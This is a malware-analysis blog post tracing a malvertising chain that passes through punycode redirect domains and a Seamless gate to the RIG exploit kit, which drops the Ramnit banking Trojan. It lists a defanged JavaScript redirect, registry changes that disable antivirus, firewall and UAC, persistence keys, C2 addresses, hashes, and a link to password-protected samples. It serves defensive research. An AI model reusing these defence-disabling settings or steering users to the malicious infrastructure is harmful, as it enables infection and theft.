Last week I decided to play around with some sketchy sites and, not surprisingly, I found myself getting infected with malware. Let’s go over the redirection chain and then I’ll go into brief detail about the malware infection.
After browsing on the sketchy site, we see some traffic to buzzadnetwork.com:
Alexa shows that buzzadnetworks.com is ranked 326 globally.
The request returns a 302 Moved Temporarily, pointing to a new location at xn--b1aanbnczd5ie1bf.xn--p1ai. Punycode is being used to encode the internationalized domain name (IDN). This decodes to языковязыков.рф (using a Cyrillic country code top-level domain).
The HTTP GET request for /redirect.php?acsc=93042904 returned the following:
The time zone information, referer, etc., is POSTed back to the server:
The server responds with the following:
$(“body”).remove();$(“html”).append(“body”).html(”
“);window.location.href = “hxxp://turself-josented[.]com/voluum/?acsc=93042904”
This causes an HTTP GET request for the resource located toturself-josented.com. The server responds with the following:
The meta refresh redirects to a resource at redirect.turself-josented[.]com. The server responds to this GET request with the location of the Seamless gate:
The threat actors behind the Seamless campaign have been using Punycode for the location of the gates for over a month now; in our example it was xn--b1aanbboc3ad8jee4bff.xn--p1ai. This decodes to языковязыковязы.рф. The meta refresh redirects to the gate and the server responds with an iframe to RIG EK:
I’m not sure on why they switched from using IP-literal hostnames to Punycode. Here is some additional information on Punycode being used by bad guys.
Not surprisingly, the Seamless Campaign is still using RIG EK to deliver Ramnit banking Trojan. Often times I find that it also downloads AZORult.
File System
The Ramnit payload was downloaded to %Temp% and then detonated:
Process bilo22.exe modified the registry by setting the following:
- HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\jfghdug_ooetvtgk = TRUE
- Persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\UfyQwfyv = %AppData%\mykemfpi\ufyqwfyv.exe
- HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = 0
- HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusOverride = 1
- HKLM\SOFTWARE\Microsoft\Security Center\AntiVirusDisableNotify = 1
- HKLM\SOFTWARE\Microsoft\Security Center\FirewallDisableNotify = 1
- HKLM\SOFTWARE\Microsoft\Security Center\FirewallOverride = 1
- HKLM\SOFTWARE\Microsoft\Security Center\UpdatesDisableNotify = 1
- HKLM\SOFTWARE\Microsoft\Security Center\UacDisableNotify = 1
- HKLM\System\CurrentControlSet\services\wscsvc\Start = 4
- HKLM\System\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = 0
- HKLM\System\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = 0
- HKLM\System\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = 1
- HKLM\System\CurrentControlSet\services\MpsSvc\Start = 4
- HKLM\System\CurrentControlSet\services\WinDefend\Start = 4
- HKLM\System\CurrentControlSet\services\wuauserv\Start = 4
- Persistence: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit = C:\Windows\system32\userinit.exe,,C:\Users\\AppData\Local\mykemfpi\ufyqwfyv.exe
Process bilo22.exe creates the following files:
- Copies itself to %LocalAppData%\mykemfpi\ufyqwfyv.exe
- Persistence: %AppData%\Microsoft\Windows\Start Menu\Programs\Startup\ufyqwfyv.exe
After rebooting:
- svchost.exe creates .log file %ProgramData%
- svchost.exe creates numerous .log files in %LocalAppData%
- HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = 0
- HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = 1
- tracert.exe sets registry key “HKCU\Software\AppDataLow\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\Client”
Network Traffic
- 104.197.122.221 – www[.]buzzadnetworks[.]com – GET /jump/next.php
- 31.31.196.183 – xn--b1aanbnczd5ie1bf.xn--p1ai – GET and POST /redirect.php
- 52.8.118.144 – turself-josented.com – GET /voluum/
- 52.8.118.144 – redirect.turself-josented.com – GET /redirect
- 31.31.196.182 – xn--b1aanbboc3ad8jee4bff.xn--p1ai – GET /gav4.php – Seamless gate
- 5.188.60.18 – RIG EK IP-literal hostname
- DNS queries for google.com followed by HTTP requests (non-malicious)
- TCP traffic to 194.87.236.35 port 443 – awogqfbalyisqceqla.com
- TCP traffic to 87.106.190.153 port 443 – bmgjcjssu.com
Additional details on C2 traffic:
==================================================
Remote Address : 194.87.236.35
Remote Host Name : unspecified.mtw.ru
Remote Port : 443
Process ID : 3716
Process Name : svchost.exe
Process Path : C:\Windows\system32\svchost.exe
==================================================
==================================================
Remote Address : 87.106.190.153
Remote Port : 443
Process ID : 3716
Process Name : svchost.exe
Process Path : C:\Windows\system32\svchost.exe
==================================================
Image of HTTP requests and DNS queries:
Hashes
SHA256: cc80f45b6c770ea59d8584526cc2a2b2574f78ab87b739a360750d5e470207d2
File name: RigEK landing page.txt
SHA256: 8e13de0f5fc422d6098ef03bc040e650c1cde89f8541f8acf3617ff122b64185
File name: RigEK Flash exploit.swf
SHA256: 1aa23536dc6ed14b0a49a2438ba9e9e3332bf467789c55dd2adc3b97bea236d4
File name: o32.tmp
SHA256: b77167bf6101fc2fc07ac50fa977ffff567b44daeb216a52c1a8c66d79a421d2
File name: bilo22.exe
HA Report
Downloads
Password is “infected”
References
- https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/w32-ramnit-analysis-15-en.pdf
- https://www.cert.pl/news/single/ramnit-doglebna-analiza/ (original source)
- https://www.cert.pl/en/news/single/ramnit-in-depth-analysis/ (English version)
Article Link: https://malwarebreakdown.com/2018/01/16/rig-exploit-kit-delivers-ramnit-banking-trojan-via-seamless-malvertising-campaign/